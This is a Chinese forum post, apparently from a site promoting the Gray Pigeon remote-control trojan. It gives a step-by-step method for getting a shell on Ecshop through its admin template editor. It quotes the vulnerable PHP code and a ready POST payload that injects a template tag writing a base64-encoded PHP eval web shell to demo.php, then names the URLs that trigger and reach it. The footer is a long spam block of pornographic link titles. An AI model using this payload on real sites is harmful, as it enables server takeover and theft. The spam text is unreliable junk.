灰鴿子遠(yuǎn)程控制軟件

標(biāo)題: post在Ecshop后臺getshell的方法 灰鴿子下載www.dumiaotech.com [打印本頁]
作者: admin    時間: 2013-2-3 14:10
標(biāo)題: post在Ecshop后臺getshell的方法 灰鴿子下載www.dumiaotech.com
post在Ecshop后臺getshell的方法 灰鴿子下載

admin/template.phpif ($_REQUEST['act'] == ‘update_library’)
{
    check_authz_json(‘library_manage’);
    $html = stripslashes(json_str_iconv($_POST['html']));
    $lib_file = ‘../themes/’ . $_CFG['template'] . ‘/library/’ . $_POST['lib'] . ‘.lbi’; //模板文件
    $lib_file = str_replace(“0xa”, ”, $lib_file); // 過濾 0xa 非法字符
    $org_html = str_replace(“\xEF\xBB\xBF”, ”, file_get_contents($lib_file));
    if (@file_exists($lib_file) === true && @file_put_contents($lib_file, $html))//寫出
    {
        @file_put_contents(‘../temp/backup/library/’ . $_CFG['template'] . ‘-’ . $_POST['lib'] . ‘.lbi’, $org_html);
        make_json_result(”, $_LANG['update_lib_success']);
    }
    else
    {
        make_json_error(sprintf($_LANG['update_lib_failed'], ‘themes/’ . $_CFG['template'] . ‘/library’));
    }
}
那么找個比較方便調(diào)用了模板的文件
index.php
if ($act == ‘cat_rec’)
{
    $rec_array = array(1 => ‘best’, 2 => ‘new’, 3 => ‘hot’);
    $rec_type = !empty($_REQUEST['rec_type']) ? intval($_REQUEST['rec_type']) : ’1′;
    $cat_id = !empty($_REQUEST['cid']) ? intval($_REQUEST['cid']) : ’0′;
    include_once(‘includes/cls_json.php’);
    $json = new JSON;
    $result   = array(‘error’ => 0, ‘content’ => ”, ‘type’ => $rec_type, ‘cat_id’ => $cat_id);

  $children = get_children($cat_id);
    $smarty->assign($rec_array[$rec_type] . ‘_goods’,      get_category_recommend_goods($rec_array[$rec_type], $children));    // 推薦商品
    $smarty->assign(‘cat_rec_sign’, 1);
    $result['content'] = $smarty->fetch(‘library/recommend_’ . $rec_array[$rec_type] . ‘.lbi’);//使用了模板文件 該模板文件為recommend_best
        echo ‘library/recommend_’ . $rec_array[$rec_type] . ‘.lbi’;
        echo $rec_array[$rec_type];
    die($json->encode($result));
}

那么就有利用方法了
post包到http://www.dumiaotech.com/ec/admin/template.php?act=update_library
Post內(nèi)容:
lib=recommend_best&html={if fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if}
復(fù)制代碼
然后訪問http://localhost/ec/index.php?act=cat_rec
shel地址:http://localhost/ec/demo.php





歡迎光臨 灰鴿子遠(yuǎn)程控制軟件 (http://www.dumiaotech.com/) Powered by Discuz! X3.4
主站蜘蛛池模板: 亚洲综合最新无码专区| 欧洲精品久久久av无码电影| 无码色偷偷亚洲国内自拍| 国产精品亚洲а∨无码播放麻豆| 国产成人精品无码专区| 亚洲中文字幕无码一区| 东京热加勒比无码视频| 影院无码人妻精品一区二区| 亚洲熟妇av午夜无码不卡| 中文字幕人妻无码专区| 国产亚洲精久久久久久无码77777| 久久久无码精品国产一区 | 永久免费AV无码国产网站| 精品无码久久久久久久久水蜜桃 | 成人无码AV一区二区| 免费无码肉片在线观看| 一本色道无码道DVD在线观看| 黄A无码片内射无码视频 | 无码午夜人妻一区二区不卡视频 | 国产精品无码无卡无需播放器 | 少妇伦子伦精品无码STYLES| 中文字幕有码无码AV| 精品久久久久久无码人妻中文字幕| 亚洲国产精品无码久久久蜜芽| 国产成人亚洲综合无码精品 | 国产精品无码a∨精品| 国产成人无码精品一区不卡| 无码一区18禁3D| 午夜成人无码福利免费视频| h无码动漫在线观看| 无码天堂亚洲国产AV| 加勒比无码一区二区三区| 久久无码av亚洲精品色午夜| 无码爆乳护士让我爽| 无码专区HEYZO色欲AV| 亚洲爆乳少妇无码激情| 亚洲av无码日韩av无码网站冲| 精品国产aⅴ无码一区二区| 人妻无码久久精品| 亚洲Av无码国产情品久久| 亚欧无码精品无码有性视频|